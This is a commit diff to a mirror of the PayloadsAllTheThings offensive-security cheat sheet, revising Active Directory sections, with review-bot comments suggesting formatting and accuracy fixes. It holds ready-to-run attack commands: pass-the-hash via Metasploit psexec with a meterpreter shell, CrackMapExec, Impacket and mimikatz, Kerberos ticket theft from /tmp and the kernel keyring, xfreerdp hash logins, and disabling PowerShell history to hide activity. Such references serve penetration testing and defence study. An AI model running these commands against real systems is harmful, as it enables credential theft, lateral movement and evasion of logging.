mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Active Directory update
This commit is contained in:
parent
175c676f1e
commit
44735975a5
3 changed files with 47 additions and 32 deletions
|
@ -1506,35 +1506,31 @@ Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.
|
||||||
|
|
||||||
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
||||||
|
|
||||||
```powershell
|
* Metasploit
|
||||||
use exploit/windows/smb/psexec
|
```powershell
|
||||||
set RHOST 10.2.0.3
|
use exploit/windows/smb/psexec
|
||||||
set SMBUser jarrieta
|
set RHOST 10.2.0.3
|
||||||
set SMBPass nastyCutt3r
|
set SMBUser jarrieta
|
||||||
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
set SMBPass nastyCutt3r
|
||||||
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
||||||
set PAYLOAD windows/meterpreter/bind_tcp
|
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
||||||
run
|
set PAYLOAD windows/meterpreter/bind_tcp
|
||||||
shell
|
run
|
||||||
```
|
shell
|
||||||
|
```
|
||||||
or with crackmapexec
|
* CrackMapExec
|
||||||
|
```powershell
|
||||||
```powershell
|
cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
||||||
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
```
|
||||||
also works with net range : cme smb 10.2.0.2/24 ...
|
* Impacket suite
|
||||||
```
|
```powershell
|
||||||
|
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
||||||
or with psexec
|
```
|
||||||
|
* Windows RDP and mimikatz
|
||||||
```powershell
|
```powershell
|
||||||
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863
|
||||||
```
|
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the users ntlm hash> /run:"mstsc.exe /restrictedadmin"
|
||||||
|
```
|
||||||
or with the builtin Windows RDP and mimikatz
|
|
||||||
```powershell
|
|
||||||
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
|
|
||||||
```
|
|
||||||
|
|
||||||
You can extract the local **SAM database** to find the local administrator hash :
|
You can extract the local **SAM database** to find the local administrator hash :
|
||||||
|
|
||||||
|
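Review bot: the fence tags in the rewritten Pass-the-Hash list do not match their content: the Metasploit block holds msfconsole commands and the CrackMapExec and Impacket blocks hold Linux command lines (`cme smb ...`, `proxychains python ./psexec.py ...`), yet all of them are fenced ```powershell; only the mimikatz block is Windows-side. Tagging the Linux blocks as bash (or plain text) would keep the bullets consistent. The rewrite also drops the old remark that CME accepts a network range (`cme smb 10.2.0.2/24 ...`) while changing the example to a single host; restoring it as a comment in the CrackMapExec block keeps that information. Lastly, the two `sekurlsa::pth` lines in the mimikatz block differ only by `/run:"mstsc.exe /restrictedadmin"`; a one-line comment stating what each variant is for (the second launches the RDP client in Restricted Admin mode) would make the distinction explicit to the reader.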
@ -2625,15 +2621,30 @@ Navigate to any web application that is integrated with our AAD domain. Once at
|
||||||
|
|
||||||
### CCACHE ticket reuse from /tmp
|
### CCACHE ticket reuse from /tmp
|
||||||
|
|
||||||
List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`
|
|
||||||
|
|
||||||
> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
|
> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
|
||||||
|
|
||||||
|
List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ ls /tmp/ | grep krb5cc
|
||||||
|
krb5cc_1000
|
||||||
|
krb5cc_1569901113
|
||||||
|
krb5cc_1569901115
|
||||||
|
|
||||||
|
$ export KRB5CCNAME=/tmp/krb5cc_1569901115
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### CCACHE ticket reuse from keyring
|
### CCACHE ticket reuse from keyring
|
||||||
|
|
||||||
Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey
|
Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
# Configuration and build
|
||||||
|
git clone https://github.com/TarlogicSecurity/tickey
|
||||||
|
cd tickey/tickey
|
||||||
|
make CONF=Release
|
||||||
|
|
||||||
[root@Lab-LSV01 /]# /tmp/tickey -i
|
[root@Lab-LSV01 /]# /tmp/tickey -i
|
||||||
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
|
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
|
||||||
[+] root detected, so... DUMP ALL THE TICKETS!!
|
[+] root detected, so... DUMP ALL THE TICKETS!!
|
||||||
|
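Review bot: the new sentence "Kerberos ticket name format is `krb5cc_%{uid}`" presents the FILE ccache naming as universal, but the tickey output later in this hunk shows `krb5 ccache_name = KEYRING:session:sess_%{uid}`, so the name depends on the configured ccache type. Suggest "When the ccache type is FILE, the default name is `/tmp/krb5cc_%{uid}` where uid is the user UID" so the /tmp listing and the keyring section do not contradict each other. The `ls /tmp/ | grep krb5cc` / `export KRB5CCNAME=...` block is a Linux shell session and should be fenced ```bash rather than ```powershell. In the tickey addition, the build runs in `tickey/tickey` but the next line executes `/tmp/tickey -i`; add the step that copies the built binary to `/tmp` (or run it from its build path) so the sequence is complete.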
@ -2794,4 +2805,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html)
|
* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html)
|
||||||
* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/)
|
* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/)
|
||||||
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work)
|
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work)
|
||||||
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
|
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
|
||||||
|
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
|
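Review bot: the new reference uses the date form `2021/05/29` while the neighbouring entries use `April 01, 2020`, `23 Jun 2021` and `Jul 8, 2021`; the list is already mixed, but picking one date style for the added line (and ideally for the block) would keep the `Title - Author - Date` entries uniform.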
@ -541,6 +541,8 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||||
|
|
||||||
### Powershell History
|
### Powershell History
|
||||||
|
|
||||||
|
Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
|
|
|
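Review bot: the added line `Set-PSReadlineOption -HistorySaveStyle SaveNothing` sits between the heading and the two `type` commands, so it reads as the section's first step; placing it after the code block (or prefixing it with "To stop new commands from being recorded:") keeps the "where the history file lives" part first. It is also worth stating that the option does not remove the existing `ConsoleHost_history.txt` shown below. Separately, both `type %userprofile%\...` lines are inside a ```powershell fence, where `%userprofile%` is not expanded (that is cmd.exe syntax); in PowerShell use `Get-Content $env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` or `Get-Content (Get-PSReadlineOption).HistorySavePath`.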
@ -292,6 +292,7 @@ Abuse RDP protocol to execute commands remotely with the following commands;
|
||||||
|
|
||||||
# pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
# pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||||
# pass the hash works for Server 2012 R2 / Win 8.1+
|
# pass the hash works for Server 2012 R2 / Win 8.1+
|
||||||
|
# require freerdp2-x11 freerdp2-shadow-x11 packages instead of freerdp-x11
|
||||||
root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d
|
root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d
|
||||||
```
|
```
|
||||||
* [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
* [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||||
|
|
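Review bot: the added comment `# require freerdp2-x11 freerdp2-shadow-x11 packages instead of freerdp-x11` should say what needs them: the `/pth:` option on the following line is what the freerdp2 builds provide, and those are Debian/Ubuntu package names, so phrase it as "on Debian/Ubuntu, `/pth` needs freerdp2-x11 freerdp2-shadow-x11 rather than freerdp-x11". Since the comments above tie this to Restricted Admin, a note that the target must have Restricted Admin mode enabled (it is off unless configured) would complete the context for the `/pth` example.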